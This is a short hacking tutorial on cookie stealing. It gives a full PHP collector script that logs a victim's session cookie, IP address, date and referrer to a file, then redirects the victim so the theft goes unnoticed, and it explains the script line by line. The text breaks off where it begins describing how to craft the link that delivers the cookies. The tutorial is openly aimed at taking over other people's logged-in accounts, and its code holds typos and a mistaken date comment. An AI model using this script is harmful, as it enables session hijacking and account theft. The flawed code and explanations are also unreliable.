Cookie Stealing

Cookie Stealing

What is it?

A cookiestealer is a small script, written in a webbased programming language (in this case PHP). It reads a variable from the address-bar, which contains in our case the cookies, which we want to steal. Ofcourse you can add some more information, like the referrer, the IP and the date and time of the log.

Why to use it?

As you might know, most of the time, login-information is stored in cookies.So if you can make the browser think you're the one who logged in, and setthe cookies, you'll be able to login as the person you defaced. How we makethe browser think this, I will learn you later on.

Writing the stealer.

will give you the script and after that I will explain what it does line by line. So here it is:

1 2 $cookie = $_GET['c];
3 $ip = getenv ('REMOTE_ADDR');
4 $date=date("j F, Y, g:i a");;
5 $referer=getenv ('HTTP_REFERER');
6 $fp = fopen('cookies.txt', 'a');
7 fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


');
8 fclose($fp);
9 header ("Location: /picture.html");
10 ?>

That's all! Well, time to explain:
1: 2: $cookie = $_GET['C']; Here the variable $cookie gets the content out ofthe adress, from what's behind C=[the cookie]
3: $ip = getenv ('REMOTE_ADDR'); That's the IP of the person which is redirected to our stealer.
4. $date=date("j F, Y, g:i a");; This sets the variable $date the current time and date, IMPORTANT: this is done in dutch way, so year - month - day!
5. $referer=getenv ('HTTP_REFERER'); That must be the referer, don't youthink =p
6. $fp = fopen('cookies.txt', 'a'); This specifies the file which has to be rewritten with the cookie, and 'a' stands for the way of writing, in this case adding the new content to the end of the file.
7. fwrite($fp, 'Cookie: '.$cookie.'\n IP: ' .$ip. '\n Date and Time: ' .$date. '\nReferer: '.$referer.'\n\n\n'); This line writes the content to the file.
8. fclose($fp); Close the file (dûh)
9. header ("Location: /picture.html"); send the visitor to another page, so hewont notice that the cookie is logged... ofcourse picture.html can be everything.
10. ?> The closing tag for a php-script
Now we have to know how to make the link:This must be the most basic version: